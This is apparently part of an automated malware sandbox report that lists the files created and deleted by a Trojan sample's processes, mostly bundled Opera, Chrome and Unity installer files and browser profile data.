%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\76C397A8-9E8E-4706-8203-BD2878E9C618.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_100_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_200_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-140_contrast-white.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\3B6191A0-8BF3-11E2-9E96-0800200C9A66.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Resources.pri (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\default_theme.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\it.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sk.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\server_tracking_data (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\mojo_public_test_support.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CCCED631-6DA2-4060-9824-95737E64350C.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\th.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\2A3F5C20-8BF5-11E2-9E96-0800200C9A66.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\tr.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fy.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-100.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\default_localized_themes.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\uz.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\notification_default.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ko.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-80_contrast-white.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-80.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\te.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\darkbreeze.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\dbghelp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-180_contrast-white.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\F98D4D4C-8AA7-4619-A1E7-AC89B24558DD.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FFF3F819-B6CE-4DE6-B4E4-8E2618ABC0D9.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ca.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\launcher.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\reine.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\07593226-C5C5-438B-86BE-3F6361CD5B10.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nb.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zh-TW.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\win8_importing.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_autoupdate.licenses (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\zu.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\6D3582E1-6013-429F-BB34-C75B90CDD1F8.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FDC2CCAB-E8F9-4620-91DD-B0B67285997C.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fi.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-100_contrast-white.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pt-PT.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\6.tmp.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes\landscape_photo.zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\B478FE0C-0761-41C3-946F-CD1340356039.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\message_center_win8.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\66DD4BB6-A3BA-4B11-AF7A-F4BF23E073B2.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sv.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\gd.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\af.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\az.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hi.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\0CD5F3A0-8BF6-11E2-9E96-0800200C9A66.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\libEGL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\msvcr100.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.log (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-80_contrast-white.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\wow_helper.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\5BBBDD5B-EDC7-4168-9F5D-290AF826E716.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ja.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\lv.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\sr.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\standard_themes (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ru.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\bg.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-140.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fr-CA.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\icudtl.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\pa.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_125_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\clearkeycdmadapter.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ro.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\fil.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\2F8F0E41-F521-45A4-9691-F664AFAFE67F.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\nn.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\vi.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\hu.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\root_files_list (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\clearkeycdm.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_crashreporter.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ms.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\el.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\8D754F20-8BF5-11E2-9E96-0800200C9A66.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\4C95ADC1-5FD9-449D-BC75-77CA217403AE.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\libGLESv2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\kk.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\en-GB.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\installer_prefs_include.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\opera_250_percent.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\snapshot_blob.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\natives_blob.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\widevinecdmadapter.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\3BFDFA54-5DD6-4DFF-8B6C-C1715F306D6B.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\F3F34CBB-24FF-4830-9E87-1663E7A0A5EE.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\FF57F01A-0718-44B7-8A1F-8B15BC33A50B.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\150x150Logo.scale-140.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\dictionaries.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\lt.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-180.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization\ta.pak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\localization (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\resources\CFD4BE41-4C6D-496A-ADDB-4095DFA1DD0E.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Opera Installer\opera_installer_20151219212422\Assets\70x70Logo.scale-100_contrast-white.png (0 bytes)

The process 6.tmp.exe:2496 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\opera_crashreporter.log (0 bytes)

The process 26.tmp.exe:2440 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\SETUP.EX_ (1659 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\setup.exe (17080 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\CHROME.PACKED.7Z (366388 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\SETUP.EX_ (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp\CHROME.PACKED.7Z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CR_14A70.tmp (0 bytes)

The process UnityWebPlayer.exe:3196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPluginAX.ocx (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\npUnity3D32.dll (32784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl33.tmp (67936 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\info.plist (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\Uninstall.exe (6078 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityWebPlayerUpdate.exe (19592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\UAC.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\UnityBugReporter.exe (25112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Unity\WebPlayer\loader\UnityWebPlayerNP.map (12536 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsa34.tmp\UAC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv32.tmp (0 bytes)

The process 1.tmp.exe:496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awh2.tmp (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh3.tmp (97548 bytes)

The process 1.tmp.exe:1288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\awh4.tmp (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\awh5.tmp (97548 bytes)

The process opera.exe:1432 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_j8UY4HJBbD6HK4M (286 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\browser_startpage_0.localstorage (299 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2D0EAFE99DD0474CD3DF1720DC4B3759 (85 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarE.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C8E7EC0C85688F4738F3BE49B104BA67 (344 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\18.tmp (409 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\History Provider Cache (443 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\F.tmp (46 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\24.tmp (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_b4ioryJksPsMDbo (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar1E.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0A2EA55F20CC96EF43A26E7FAF8A2217 (7818 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2F.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\23.tmp (6 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage (299 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\chrome-extension_knohfebhibeknbfioecpdmdkjkjdnjnl_0.localstorage-journal (5545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab16.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar13.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Favicons (11574 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\28.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (147 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\themes_backup\default_theme.zip (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (1224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab10.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\25.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_2 (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_3 (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_0 (20156 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Opera Software\Opera Stable\Cache\data_1 (17256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\40C68D5626484A90937F0752C8B950AB (320 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Login Data-journal (532 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\69C6F6EC64E114822DF688DC12CDD86C (232 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\20.tmp (52 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\5A5BEF2B5F5EF69232280A995B9D2FA7 (156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_GV1rG49dpArioGw (532 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Web Data (22643 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\000003.log (1692 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab14.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\29.tmp (32 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar1B.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\38.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\1D.tmp (5 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Web Data-journal (4492 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (54 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2C.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\26FAECAB15AD715CB7849E2211F9473B (520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab11.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\37.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (1224 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\30.tmp (552 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\35.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Current Session (1997 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\27.tmp (805 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\21.tmp (381 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\26FAECAB15AD715CB7849E2211F9473B (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1C.tmp (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0270780F846F08BEFE0DD8112D932FEF (543 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar15.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Favicons-journal (20160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar17.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\22.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C8E7EC0C85688F4738F3BE49B104BA67 (1298 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2A.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\36.tmp (32 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Cookies (1043 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Visited Links (560 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\2B.tmp (459 bytes)
%WinDir%\Tasks\Opera scheduled Autoupdate 1450553101.job (68 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\siteprefs.json.new (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_RZPzBVWNzpValWY (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2D.tmp (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab19.tmp (49 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\40C68D5626484A90937F0752C8B950AB (1066 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\History (30289 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Local Storage\browser_startpage_0.localstorage-journal (5554 bytes)
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Login Data (2706 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabB.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2D0EAFE99DD0474CD3DF1720DC4B3759 (220 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2E.tmp (105 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Cookies-journal (5308 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Certificate Revocation Lists (501 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\1A.tmp (643 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\69C6F6EC64E114822DF688DC12CDD86C (531 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\dictionaries\dictionaries.xml (11 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\default_partner_content.json (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Extension State\LOG (153 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\5A5BEF2B5F5EF69232280A995B9D2FA7 (200 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0A2EA55F20CC96EF43A26E7FAF8A2217 (280 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar12.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\History-journal (18376 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0270780F846F08BEFE0DD8112D932FEF (268 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_wdq57A8ptfRDlCo (514 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Cab9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Bookmarks~RF94460.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab11.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RFa2e62.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarE.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Bookmarks~RF939d1.TMP (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RFa5582.TMP (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\ssdfp1432.0.2065251784~RF92b59.TMP (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RFaa3c1.TMP (0 bytes)
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Application Data\Opera Software\Opera Stable\Preferences~RF97e7b.TMP (0 bytes)
